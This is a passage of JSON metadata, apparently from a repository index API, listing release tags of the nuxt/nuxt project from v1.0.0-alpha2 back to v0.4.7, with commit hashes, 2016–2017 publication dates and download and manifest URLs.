uxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v